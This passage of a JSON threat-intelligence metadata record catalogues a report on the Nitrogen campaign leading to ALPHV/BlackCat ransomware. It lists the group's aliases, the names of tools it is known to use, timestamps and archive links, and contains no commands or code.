		"https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware"
	],
	"report_names": [
		"nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434002,
	"ts_updated_at": 1775791780,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ccfe60f5a8e32c118e782abb5d3ad5d500b4bf25.pdf",
		"text": "https://archive.orkl.eu/ccfe60f5a8e32c118e782abb5d3ad5d500b4bf25.txt",
		"img": "https://archive.orkl.eu/ccfe60f5a8e32c118e782abb5d3ad5d500b4bf25.jpg"
	}
}